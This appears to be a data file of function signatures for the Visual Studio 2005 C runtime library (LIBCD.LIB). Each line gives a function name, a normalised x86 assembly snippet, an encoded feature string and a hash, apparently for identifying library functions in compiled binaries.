+__XcptFilter,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",GaZm/2s48mQAAAAAKdmrsEBx7WWvJ1dcchOXy2s48mQAAAAADt/kkGs48mSJx9mBrydXXE+LzAoAAAAAicfZgUw7UtIAAAAAQHHtZbZdEfIUZSvoazjyZEw7UtIAAAAAGaZm/2s48mQAAAAADt/kkA7f5JAZpmb/eFnRr22C4ZAp2auwtl0R8k+LzAoAAAAAGaZm/2s48mQAAAAAFGUr6KbRG9MAAAAADt/kkA7f5JAZpmb/1U/7iNvHHyBZ4mf3TDtS0k+LzAoAAAAAGaZm/2s48mQAAAAAKdmrsCnZq7BtguGQptEb09vHHyBZ4mf3bYLhkE+LzAoAAAAAT4vMCgAAAAAAAAAADt/kkA7f5JAZpmb/Dt/kkA7f5JAZpmb/WeJn99VP+4gAAAAAGaZm/2s48mQAAAAAKdmrsCnZq7BF8H9wRfB/cE+LzAoAAAAADt/kkA7f5JAZpmb/28cfIA7f5JByE5fL,[],bcb7fba6a439c84e212e8d7590634c908952f58e,VS2005,LIBCD.LIB
+__lseeki64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nOR R32,CONST\nJMP SHORT CONST",T4vMCgAAAAAAAAAAjNadWE+LzAoAAAAA7bLtN2Y/E14GYojDdvz6povOGzSM1p1YIdA0QYvOGzR2/Pqmi84bNE+LzAoAAAAAIYtX1U+LzAoAAAAAAWljvCHQNEEhi1fVZj8TXk+LzAoAAAAABmKIwwFpY7xmPxNe,[],79156738f9a857742ce5bb3e82dff39376ed7443,VS2005,LIBCD.LIB
+__ioterm,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",nIZROE+LzAp1v21Wdb9tVl6jgycAAAAAojkvFZyGUTgAAAAAXqODJ9TZ7ssAAAAA1Nnuy0+LzAp1v21WT4vMCgAAAAAAAAAA,[],dfdbdd108bec3dc3e11e2dc71aaf06c0d1ee1ade,VS2005,LIBCD.LIB
+__ioinit,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",9CnuCGnNBgAAAAAASUluL5s5GW9ujbqeac0GAPQp7ghrErzmIZK58wf3dPtf/Q2BFGUr6PQp7ggAAAAAaxK85hP2y6pxWpQ6ac0GAAf3dPtf/Q2Bg65DXvQp7giDrkNeIPYgC/BwssoAAAAAbo26nl6jgycAAAAAVYQBtIN9Pi8AAAAAg65DXjUWchMbMMiTX/0NgUItIZqkty3cGzDIkzUWchMbMMiTcmqfeYN9Pi8AAAAAmzkZb16jgycAAAAAGzDIkwAAAABfhFSSfCvi1TUWchPtsR5JpLct3CAYrV70Ke4Im71p5lwu/YrtsR5JE/bLqhMZ0PgAAAAA8HCyyjUWchPtsR5JX4RUkjUWchMAAAAAg30+L1wu/YrtsR5JVMGa/BMZ0PgAAAAA9CnuCGTqVrUAAAAAXqODJ16jgycAAAAAKZjQrjUWchMAAAAAIBitXimY0K5k6la1mSB9OvQp7ghcSeK27bEeSZu9aeYAAAAAXqODJzUWchMAAAAAQi0hmiGSufMAAAAAExnQ+PQp7ghcSeK2ZOpWtSmY0K5k6la1cVqUOlTBmvwAAAAA7bEeSXwr4tUAAAAANRZyEyGSufMAAAAANRZyE5kgfToAAAAAXC79ivQp7ghpzQYAB/d0+wAAAAAAAAAA9CnuCIOuQ14AAAAAZOpWtSmY0K5JSW4vXEnitiD2IAsUZSvoVuG1fnJqn3lVhAG0q6mk4vQp7giDrkNeNRZyE6uppOIAAAAA,[],e89c71415c38f87cb3331138a68a20746b6b9cce,VS2005,LIBCD.LIB
+__mbctoupper,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",+VTkWGs0duLLgsuVbzGg/0FF0BsAAAAAoDc6oU+LzAoAAAAA3+IU/0+LzAoAAAAASsDrlgADk7H5VORYAAOTsfh3+cFvMaD/y4LLlU+LzAoAAAAA+Hf5wUFF0BsAAAAAQUXQG0+LzAoAAAAAazR24t/iFP+gNzqhT4vMCgAAAAAAAAAA,[],4a69129156b684fd39e685ea22df3cbea87a3abd,VS2005,LIBCD.LIB
+__wopenfile,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nTEST R32,R32\nJCC CONST",j2UOgZZz8F8AAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4ZnkxNcSg0gkAAAAAnIZROORSvJ+S9NEBlnPwX4T0B/kAAAAAkvTRAeRSvJ87j6vlhPQH+WjaqfppzQYAMJ37VpyGUTgAAAAAxKDSCQAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTiWT5j4ac0GAGjaqfpvoHUmlnPwXzUWchMAAAAAlk+Y+I9lDoGchlE4nIZROORSvJ+S9NEBNRZyE4T0B/kAAAAAb6B1JpZz8F/Bm6AukvTRAeRSvJ87j6vlaNqp+uZcZjQNzMABnIZROEbFy7qchlE4nIZROI9lDoFeo4MnXqODJ2Z5MTUAAAAARsXLupZz8F8AAAAAwZugLgAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4DczAAcSg0gkAAAAAnIZROORSvJ+S9NEB5lxmNMSg0gkAAAAAj2UOgZZz8F8AAAAAkvTRAeRSvJ87j6vl,[],87a2aa0a37c7fecddea76645a5aff7625349a983,VS2005,LIBCD.LIB
+__popen,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",rt/g2K7f4Nh11HFx9CnuCNrA0cMAAAAAUr1yxa7f4NgAAAAAddRxca7f4NgAAAAAFHK6BNrA0cOWc/Bf00ncp5DDFJY1FnIToG9yxNNJ3KckA8Odrt/g2Cbu4WV11HFxsqX+EDUWchPNwfQM2sDRw21JBQY1FnITddRxcSbu4WUAAAAANRZyE4zsPggAAAAA2cZe+Fs/HOw1FnITzcH0DIBmzbM1FnITL6JF1QAAAAAAAAAANRZyEybu4WUAAAAAJAPDnbD64W0kA8OdNRZyE0jscQUAAAAAlnPwX9rA0cMAAAAANRZyE1K9csUAAAAAJAPDndNJ3Kew+uFtfMdnVDUWchOchlE4bUkFBuoVh0+LsKkKsPrhbbCiEFf0Ke4I8dw8wpDDFJY1FnITi7CpCrKl/hAAAAAANRZyE67f4NgAAAAAJu7hZS+iRdUAAAAAnIZRODUWchNtSQUGgGbNs9nGXvg1FnIT9CnuCPHcPMIAAAAAbUkFBhRyugRtSQUGkMMUli+iRdUAAAAAWz8c7PGPXbQ1FnITsKIQV5DDFJY1FnITSOxxBa7f4NgAAAAAbUkFBhRyugQ1FnIT6hWHT7Kl/hAAAAAA07u3ua7f4NgAAAAANRZyE9O7t7kAAAAANRZyEybu4WUAAAAAjOw+CK7f4NgAAAAA8Y9dtLD64W2gb3LEFHK6BBRyugT0Ke4I,[],73b8ed627d318bdb8d36b57d3939316785637c11,VS2005,LIBCD.LIB
+__pclose,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",JAPDnT/dhk/r80ep1RzUtgAAAAAAAAAAT6vMHMU7YeNeo4Mn6/NHqdUc1LYAAAAAP92GT9Uc1LYAAAAAObf6Xl6jgydPq8wcXqODJ9Uc1LYAAAAAxTth4+vzR6kkA8Od,[],dce8312bb94d8c0bd57f6854d4d3a6847b038421,VS2005,LIBCD.LIB
+_strrchr,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nOR R32,CONST\nREPNE SCAS BYTE PTR ES:[R32]\nINC R32",u35lSybu4WUNzMABJu7hZQd7Cp8AAAAAB3sKnwAAAAAAAAAADczAAQd7Cp8AAAAA,[],ea2ef32d9f2ecc9f33184f411d0c9b0d25547d7b,VS2005,LIBCD.LIB
+_frexp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFADD QWORD PTR DS:[0]\nSUB ESP,CONST\nFSTP QWORD PTR SS:[ESP]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",Zopx2PfC3SaVq0SoXqODJyLy+gAAAAAAIvL6AE+LzAoAAAAAuDz7WE+LzAoAAAAARDGKLU+LzAoAAAAA98LdJk+LzAoAAAAAlatEqCLy+gCchlE4nIZROLg8+1ichlE4T4vMCgAAAAAAAAAAnIZROEQxii1eo4Mn,[],ed6d28cac596f7ec813f64385e39388fa31a8740,VS2005,LIBCD.LIB
+__stat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",6KRdaE+LzAoAAAAAiw0UTNqbH7Z+RkN0FHK6BBnLV9mkF2NvfkZDdEka0hXamx+2KcDLaeikXWjtbek8w77gHosNFEwAAAAApBdjb6Sak6vdLNxt2psfti3sUUaA9NBH2psftoD00Efamx+23SzcbaSak6vopF1oLN2rupecjvcAAAAA7W3pPOikXWjvpn5A6KRdaE+LzAoAAAAAJvgYKeikXWjy9AgzgPTQR0+LzAoAAAAA2psftsO+4B6A9NBHgPTQR0+LzAoAAAAA76Z+QPL0CDMm+BgpfkZDdBhraD/amx+2pJqTq85VVj8AAAAA2psftoD00Efamx+2T4vMCgAAAAAAAAAASRrSFZecjvcAAAAA3Te18BRyugTopF1oLexRRtqbH7Z+RkN0vggwVpecjvcAAAAA2psftsO+4B6A9NBHGctX2dqbH7YpwMtpl5yO90+LzAoAAAAAzlVWP9qbH7YpwMtp6KRdaE+LzAoAAAAAw77gHr4IMFYAAAAA8vQIMyzdq7ropF1ogPTQR0+LzAoAAAAAGGtoP9qbH7Z+RkN02psftoD00Efamx+2,[],5c006feb77bdbacfe46e701d01fbba904d45ccc9,VS2005,LIBCD.LIB
+___dtoxmode,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",bUkFBg6V6UzdLNxtlnPwX+GZX5wAAAAAOSNkGAAAAAAAAAAAbUkFBt0s3G1tSQUGvRizujkjZBgAAAAAKcDLaTkjZBi9GLO64ZlfnDkjZBgpwMtp9CnuCOGZX5wAAAAAKcDLab0Ys7opwMtpKcDLab0Ys7opwMtppBdjb5Zz8F/0Ke4IDpXpTJZz8F+kF2NvgOERKW1JBQY+yobZKcDLab0Ys7opwMtp3SzcbZZz8F8OlelMPsqG2W1JBQYAAAAA,[],d480f7b4d9662ccc31ba01a173d5a41b699af6e7,VS2005,LIBCD.LIB
+_strncmp,"MOV R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nXOR R32,R32\nREPNE SCAS BYTE PTR ES:[R32]\nNEG R32\nADD R32,R32\nMOV R32,R32",xNmJwAAAAAAAAAAAoTjlYsTZicCPtT5uj7U+bibu4WUhh3ljMRpQyCbu4WUAAAAAIYd5Y8TZicAxGlDIJu7hZcTZicAAAAAA,[],ee69ae0ddd3f012acaff5d034d38ce0994480d02,VS2005,LIBCD.LIB
+__mbscspn,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",D9FT7chSX9deo4MncVqUOhSSUkEAAAAAXqODJ+HZBXkAAAAAyFJf116jgycAAAAAPsqG2RSSUkEAAAAA+E38Kl6jgydeo4MncVqUOuHZBXkAAAAAXqODJ+HZBXkAAAAAXqODJz7KhtkAAAAA4dkFeXfcttheo4MnPsqG2eHZBXkAAAAAFJJSQb/RaZ1xWpQ64dkFeeHZBXl33LbYXqODJ7/RaZ0AAAAAd9y22DUWchOxRhSdd9y22PhN/Cr4TfwqK4njH0+LzAoAAAAAsUYUnTUWchNeo4Mn+E38Kg/RU+3/vke7EIVrf3FalDorieMfXqODJ7/RaZ0AAAAANRZyEz7KhtkAAAAA/75Hu16jgycP0VPtv9FpnU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],382e9eef0d597276630ba0db27afec0cb4c349fb,VS2005,LIBCD.LIB
+__wexeclpe,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",O4+r5eRSvJ8AAAAA5FK8n5yGUTghIEEl+iVSyQAAAAAAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTghIEElkvTRAeRSvJ87j6vlTn+8ykG4PzQAAAAAkvTRAeRSvJ87j6vlISBBJeRSvJ+S9NEBXqODJ0G4PzQAAAAAO4+r5eRSvJ8AAAAA5FK8nyEgQSVOf7zKkvTRAeRSvJ87j6vlISBBJeRSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8nyEgQSWchlE4Qbg/NPolUsleo4MnkvTRAeRSvJ87j6vlxhVotpyGUTgAAAAAnIZROORSvJ+S9NEB,[],baf573c858a7c885028447bbff01cd97be4a5da3,VS2005,LIBCD.LIB
+__execve,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",4kJrX2KkP2OvJ1dcg65DXkFF0BuPuGMmj7hjJkFF0BsAAAAArydXXE+LzAoAAAAAvZ6eGTUWchNy9HW5+Hf5wfZV5+QAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAPsqG2ZyGUTgAAAAAcvR1uTUWchMAAAAAnIZROI+4YyaBPQJ8zdJe7JyGUTichlE4gT0CfF6jgyfq8XhPYqQ/Y16jgycAAAAANRZyE4OuQ14AAAAA4kJrX1vEAhSvJ1dc6vF4T4+4YyYAAAAAXqODJ/ZV5+QAAAAAnIZROPh3+cGDrkNenIZROF6jgyclFsgrg65DXvZV5+T4d/nBJRbIK16jgyfiQmtfrydXXE+LzAoAAAAA9lXn5OJCa1+9np4ZXqODJz7KhtkAAAAAW8QCFJyGUTgAAAAAj7hjJoOuQ14AAAAA,[],de2d077c21cc71df9278d8168c7653a3d11aca4b,VS2005,LIBCD.LIB
+___from_strstr_to_strchr,"ADD R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32\nPOP R32\nPOP R32\nMOV ESP,EBP",6FWr2p4JE7/oVava6FWr2ipT1X9Y2ig6WNooOp4JE78qU9V/J733oAAAAAAAAAAAKlPVfwAAAAAAAAAAJguIGAAAAAAAAAAAhHCHHTY9VQTYzQSm2M0EpipT1X/YzQSm2M0EpjY9VQTYzQSmPzBblHwDEoxcpTmJ2M0EpipT1X/LaBJKy2gSSjY9VQTYzQSm2M0EpipT1X/YzQSm2M0Epmvi4WrYzQSmXKU5iSe996DYzQSm2M0EpipT1X9eo4MnXqODJ54JE78AAAAA2M0EpiYLiBhY2ig6a+LhagAAAAAAAAAAWNooOlylOYl8AxKMNj1VBAAAAAAAAAAAfAMSjIRwhx3oVavaNj1VBAAAAAAAAAAANj1VBAAAAAAAAAAAngkTv4Rwhx3oVava,[],7a4bdef0fbfcc8ef48e633ae4bb99ead07ebf84a,VS2005,LIBCD.LIB
+_strchr,"XOR R32,R32\nMOV R8,BYTE PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,R32\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST CONST2,CONST\nJCC CONST",2M0EpipT1X/YzQSmn5xpMnwDEoxcpTmJ2M0EpjY9VQTYzQSm2M0EpipT1X/LaBJKy2gSSjY9VQTYzQSm2M0EpipT1X/YzQSm2M0Epmvi4WrYzQSmXKU5iWLuXvPYzQSm2M0EpipT1X9eo4MnXqODJ54JE78AAAAA2M0EpiYLiBhY2ig6a+LhagAAAAAAAAAAWNooOlylOYl8AxKMNj1VBAAAAAAAAAAAfAMSjIRwhx3oVavaNj1VBAAAAAAAAAAANj1VBAAAAAAAAAAAngkTv4Rwhx3oVava6FWr2p4JE7/oVava6FWr2ipT1X9Y2ig6WNooOp4JE78qU9V/Yu5e8wAAAAAAAAAAKlPVfwAAAAAAAAAAJguIGAAAAAAAAAAAhHCHHTY9VQTYzQSm,[],80a0d5b048804f7b67bd23c282bbe428bd2b0fdb,VS2005,LIBCD.LIB
+__mbsnbset,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],0\nJCC CONST",4dkFeV6jgyd9CUg04AIthWMBGhx2ZN6Y1RzUtgAAAAAAAAAA67Egun0JSDQAAAAA4dkFedUc1LbpXoW9T4vMCgAAAAAAAAAAN13xlV6jgycAAAAA4hc3FV6jgyfh2QV5fQlINDdd8ZUP0VPtYwEaHH0JSDTiFzcV6V6FvX0JSDQAAAAAXqODJ9Uc1LYAAAAAfQlINNUc1Lbh2QV5dmTemE+LzAoAAAAAD9FT7euxILo3XfGVfQlINF6jgyfh2QV5,[],9c7c3ebfe9e1cef32f05452b1a1c1736a24d7da1,VS2005,LIBCD.LIB
+__execvp,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",HoIHagAAAAAAAAAA,g65DXuRSvJ+S9NEBbUkFBvUJhVzTa/LaXqODJ40v/IgAAAAAkvTRAeRSvJ91gwavbUkFBo0v/Ii5zn1GkvTRAeRSvJ91gwavkW5/vAAAAAAAAAAAnIZROORSvJ+S9NEBdMD4cDUWchOkF2Nvk90UgV6jgye8VTOI02vy2vUJhVwQiylzpBdjb5yGUTiIQh8MEIspc6QXY28AAAAApBdjbzV1kVQUcroEvFUziKQXY2+8VTOIdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvdYMGr+4docQfGOhBdYMGr4OuQ17uHaHE5FK8n4OuQ17uHaHEFHK6BDUWchM1dZFUpBdjb+RSvJ+S9NEB7h2hxORSvJ+S9NEBHxjoQaQXY2+T3RSBkvTRAeRSvJ91gwavNXWRVDe217g1FnITkvTRAeRSvJ91gwav9QmFXG1JBQaT3RSBvFUziKQXY29eo4MnQDwSKx8Y6EEAAAAANRZyE5yGUTgAAAAAjS/8iDUWchNAPBIrN7bXuKQXY281FnITdYMGr6QXY2+chlE45FK8n6QXY2+chlE4XqODJ5yGUTgAAAAA5FK8n+4docQfGOhBNRZyE5yGUTgAAAAAdYMGr5yGUTiDrkNeHxjoQTUWchN0wPhwk90UgV6jgycAAAAAiEIfDKQXY2+chlE4uc59RjUWchNAPBIrk90UgbxVM4iT3RSB7xfqreRSvJ+S9NEBkvTRAeRSvJ91gwavNRZyE5yGUTgAAAAAnIZROJFuf7x8Ye+FpBdjb/UJhVxtSQUGdMD4cDUWchN0wPhw5FK8n5yGUTiDrkNefGHvhQAAAAAAAAAAnIZROORSvJ+S9NEB,b3a16544dd4f831ed14d1ecca7f80f682daa8748,VS2005,LIBCD.LIB
+__wspawnlpe,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",dYMGr5yGUTghIEEl5FK8n5yGUTghIEEldYMGryEgQSVxOZ7pkvTRAeRSvJ91gwavdYMGryEgQSWchlE4ISBBJeRSvJ+S9NEBA2oHmQAAAAAAAAAAXqODJ0G4PzQAAAAAcTme6QNqB5leo4Mn5FK8nyEgQSVxOZ7pISBBJeRSvJ+S9NEBkvTRAeRSvJ91gwavQbg/NANqB5leo4Mn5FK8nyEgQSWchlE4kvTRAeRSvJ91gwavkvTRAeRSvJ91gwava11M0+RSvJ+S9NEBnIZROORSvJ+S9NEBdYMGr5yGUTghIEEl5FK8n5yGUTghIEElnIZROORSvJ+S9NEB,[],dedb1006aa8bdd5a4b880d3ef98ea953928b09b2,VS2005,LIBCD.LIB
+__mbsncat,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",T4vMCgAAAAAAAAAAXqODJ323yXcAAAAA4hd4xYhCHwxNa5HEy4LLlU+LzAoAAAAABJYM7fYao1gAAAAAXqODJzUWchMAAAAATWuRxPYao1h33LbYy/6SnTUWchNeo4MniEIfDPYao1h33LbYjLRRTiQDw53LgsuVd9y22Mv+kp19ZM9bJAPDnTfZ+kF2ZN6YXqODJ/Yao1gAAAAANRZyE4hCHwwAAAAAdmTemE+LzAoAAAAA9hqjWNXZv2AElgztfWTPW16jgycElgztN9n6QeIXeMVeo4MnBJYM7dUc1LYAAAAAfbfJd+IXeMVeo4Mn1dm/YAAAAAAAAAAA1RzUtgAAAAAAAAAA,[],29aee33e34fa7cb6beb55e1ace5b6161cd590d17,VS2005,LIBCD.LIB
+___crtMessageBoxA,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nCMP DWORD PTR DS:[0],0\nJCC CONST",fXY1rAAAAAAAAAAAnIZROH12NawkA8OdDczAAU+LzAoAAAAAec8xvEmQREENzMABJAPDnX12NazylmcUJAPDnZyGUTh2/Pqm8pZnFAAAAAAAAAAAWLX8rQ3MwAF5zzG8T4vMCgAAAAAAAAAAdvz6pn12NawkA8OdSZBEQZyGUTh2/Pqmcv8ZOyQDw51Ytfyt,[],5d1a68c54e462c822e9f20a8e021819d37ebadeb,VS2005,LIBCD.LIB
+___crtsetenv,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",RIlivV6jgycAAAAAZnkxNS+iRdUAAAAAduUUZpyGUTichlE4XqODJ16jgycAAAAA26QWQl6jgycAAAAAnIZROCbu4WXiQmtfJu7hZS+iRdUAAAAAnIZRONukFkIYqyKlL6JF1QAAAAAAAAAAXqODJ5yGUTgAAAAAGKsipSjZPZ8AAAAAnIZROGZ5MTWchlE4JAPDnWfeM4u5yE5g0UiUpWfeM4uchlE41+NYFWfeM4uchlE4nIZROEhSQEyt/Rq5rf0auUhSQEwAAAAArydXXC+iRdUAAAAAnIZROJyGUTgkA8OdSFJATP5UgrWvJ1dcPsqG2SjZPZ8AAAAAJAPDnZyGUThSaOpbKNk9n5Ua/GcQVj8Bp/+HGK8nV1wlFsgrUmjqWzUWchOvJ1dc4kJrXybu4WUoy+KdKMvinSbu4WUAAAAAJAPDnSQDw525yE5gEFY/AT7KhtkAAAAAJRbIK68nV1yDrkNerydXXC+iRdUAAAAANRZyE2feM4sAAAAAnIZROCQDw51meTE1rydXXC+iRdUAAAAAL5p/SJyGUTh25RRmZnkxNS+iRdUAAAAAlRr8Z16jgydEiWK9rydXXC+iRdUAAAAAg65DXm3LoLGvJ1dcZ94zi5yGUTh25RRm/lSCtZyGUTgAAAAArydXXC+iRdUAAAAAuchOYGWCGw2vJ1dcbcugsdFIlKXX41gVZYIbDWfeM4u5yE5guchOYC+af0ivJ1dc,[],d5373171968ff70270dfd67cf78b113c1c7de40a,VS2005,LIBCD.LIB
+__ecvt,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",sOQDodUc1LayRlnPskZZz9Uc1LYAAAAA1RzUtgAAAAAAAAAA,[],4025bea95321cc46998fc36cc0fee70f5be88d91,VS2005,LIBCD.LIB
+__fcvt,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",7QMF5gAAAAAAAAAA,w4XffAAAAAAAAAAA,b97739c405de7c54570cafd12ec5d0810fe12d26,VS2005,LIBCD.LIB
+__CIexp,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nCALL CONST\nCALL CONST\nPOP R32",sLk6DkwX6kZkZzDaTBfqRgAAAAAAAAAAZGcw2gAAAAAAAAAA/MSgqrC5Og4AAAAA,[],84b82633414962756c989ef096cfb860f1785031,VS2005,LIBCD.LIB
+_exp,"INT3\nINT3\nINT3\nPUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32",jNC7ers9SYUAAAAAnIZROORSvJ+S9NEB8BpJtYzQu3oWcp1oO4+r5eRSvJ8AAAAA5FK8n5yGUTjwGkm1kvTRAeRSvJ87j6vl/MSgqvzEoKoAAAAAuz1JhQAAAAAAAAAA/MSgqsuUU2kAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlFnKdaLs9SYUAAAAAy5RTaZyGUTgAAAAA,[],daa68ebfff1fea48544d1c07ac366f32c1a9d61d,VS2005,LIBCD.LIB
+__snprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",jNC7ers9SYUAAAAAnIZROORSvJ+S9NEBS3YbfJyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTjwGkm1kvTRAeRSvJ87j6vl8BpJtYzQu3oWcp1ouz1JhQAAAAAAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlFnKdaLs9SYUAAAAA,[],da35a9c6a7a9e74a8482cd24c8965a094c12dedb,VS2005,LIBCD.LIB
+__outp,"XOR R32,R32\nMOV R16,WORD PTR SS:[ESP+CONST]\nMOV R8,BYTE PTR SS:[ESP+CONST]\nOUT R16,R8\nRETN",/mnCuQAAAAAAAAAA,[],31adbd9aa638c5dbae4188e8654d7a84365aac28,VS2005,LIBCD.LIB
+__outpd,"MOV R16,WORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nOUT R16,R32\nRETN",N5DATgAAAAAAAAAA,[],e8913b445122fa827694a3cd3fa7a809e8cbea63,VS2005,LIBCD.LIB
+__outpw,"MOV R16,WORD PTR SS:[ESP+CONST]\nMOV R16,WORD PTR SS:[ESP+CONST]\nOUT R16,R16\nRETN",eQ+DlwAAAAAAAAAA,[],48c420c1b99793294d47213d64d636b2904f59c8,VS2005,LIBCD.LIB
+__wpopen,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+R32*4+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR SS:[EBP+R32*4+CONST],0\nJCC CONST",QDz11a7f4NhwQOtIyebY/9rA0cOWc/BfcEDrSCbu4WV11HFxNRZyE3YqlPMAAAAA00ncp5DDFJY1FnIToG9yxNNJ3KckA8OdJu7hZS+iRdUAAAAAlnPwX9rA0cMAAAAArt/g2Cbu4WV11HFx2sDRw+h+J0w1FnITddRxcSbu4WUAAAAANRZyE4EoGY8AAAAA2cZe+Fs/HOw1FnITzcH0DIBmzbM1FnITL6JF1QAAAAAAAAAAJAPDnbD64W0kA8OdfMdnVDUWchOchlE4JAPDndNJ3Kew+uFt6H4nTOoVh0+LsKkKsPrhbbCiEFf0Ke4InIZRODUWchPofidM6H4nTMnm2P/ofidMNRZyE67f4NgAAAAAi7CpCrKl/hAAAAAAgGbNs9nGXvg1FnIT9CnuCPHcPMIAAAAAsqX+EDUWchPNwfQMkMMUli+iRdUAAAAAWz8c7PGPXbQ1FnIT6H4nTMnm2P81FnITsKIQV5DDFJY1FnITxS/waa7f4NhwQOtINRZyEybu4WUAAAAA6hWHT7Kl/hAAAAAANRZyEybu4WUAAAAAdiqU867f4NhwQOtI8dw8wpDDFJY1FnITyebY/8nm2P/0Ke4IgSgZj67f4NhwQOtINRZyE0A89dUAAAAA8Y9dtLD64W2gb3LENRZyE8Uv8GkAAAAArt/g2K7f4NhwQOtI9CnuCNrA0cMAAAAA,[],5cdd01c6d20ba7698e363c9524dbedec77b4c928,VS2005,LIBCD.LIB
